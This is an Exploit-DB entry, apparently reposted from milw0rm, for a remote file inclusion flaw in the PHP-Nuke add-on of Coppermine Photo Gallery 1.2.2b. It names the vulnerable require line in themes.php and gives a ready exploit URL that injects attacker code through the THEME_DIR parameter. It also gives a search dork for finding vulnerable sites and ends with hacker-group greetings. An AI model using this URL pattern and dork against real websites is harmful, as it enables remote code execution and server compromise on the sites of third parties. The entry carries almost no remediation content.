EXPLOITS

Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion

Author: 3l3ctric-Cracker
type: webapps
platform: php
port: 
date_added: 2006-09-14  
date_updated: 2016-09-09  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comcpg1.2.1.zip  

raw file: 2375.txt  

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Coppermine Photo Gallery v1.2.2b for PHPNUKE (THEME_DIR) Remote File Include
Vulnerability
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Level:Dangerous
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Affected Versions:
1.0 RC3
1.1 beta 2
1.1 .0
1.2
1.2.1
1.2.2 b
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Code in: themes.php
Vul code:Vul code:require($THEME_DIR."/user_list_info_box.inc");
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit
victim.com/modules/coppermine/themes/default/theme.php?THEME_DIR=evill code
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
dork: Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine
Photo Gallery v1.2.1
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Greetz:str0ke-Thehacker-AsianEagle-Nukedx-NETTOXIC-All Ayyildiz Team
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2006-09-15]